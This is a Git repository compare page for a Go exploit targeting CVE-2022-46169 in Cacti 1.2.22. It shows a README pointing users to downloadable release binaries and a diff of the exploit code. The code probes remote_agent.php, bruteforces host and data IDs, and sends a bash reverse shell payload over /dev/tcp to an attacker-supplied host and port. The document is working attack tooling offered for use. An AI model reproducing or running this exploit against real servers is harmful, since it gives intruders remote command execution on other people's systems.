Vomitblood/cve-2022-46169
1
0
Fork 0
Code Issues Pull requests Packages Projects Releases 3 Wiki Activity

Compare commits

base: Vomitblood:main
Branches Tags
Vomitblood:main
Vomitblood:3.0.0
Vomitblood:2.0.0
Vomitblood:1.0.0
..
compare: Vomitblood:1.0.0
Branches Tags
Vomitblood:main
Vomitblood:3.0.0
Vomitblood:2.0.0
Vomitblood:1.0.0

No commits in common. "main" and "1.0.0" have entirely different histories.
main ... 1.0.0

2 changed files with 4 additions and 9 deletions
Show stats Expand all files Collapse all files

4
README.md
View file

@ -1,9 +1,5 @@
# CVE-2022-46169
# Usage
Download the binary from the [latest release](https://git.vomitblood.com/Vomitblood/cve-2022-46169/releases).
For Cacti 1.2.22.
Written in Go.
Credits to [ruycr4ft](https://github.com/ruycr4ft/CVE-2022-46169).

9
internal/exploiter/exploiter.go
View file

@ -106,15 +106,14 @@ func reverseShell(payload string, vulnUrl string, hostID int, dataIDs int) {
fmt.Println("Error making request:", err)
return
}
resp.Body.Close()
defer resp.Body.Close()
}
func Exploit(urlTarget string, lhost string, lport string) {
vulnURL := urlTarget + "/remote_agent.php"
fmt.Println("Checking for vulnerability...")
fmt.Println("Checking...")
if checkVuln(vulnURL) {
fmt.Println("The target is vulnerable. Bruteforcing...")
fmt.Println("The target is vulnerable. Exploiting...")
fmt.Println("Bruteforcing the host_id and local_data_ids")
isVuln, hostID, dataIDs := bruteForcing(vulnURL)
@ -123,7 +122,7 @@ func Exploit(urlTarget string, lhost string, lport string) {
payload := fmt.Sprintf("bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'", lhost, lport)
reverseShell(payload, vulnURL, hostID, dataIDs)
} else {
fmt.Println("The bruteforce failed...")
fmt.Println("The Bruteforce Failed...")
}
} else {
fmt.Println("The target is not vulnerable")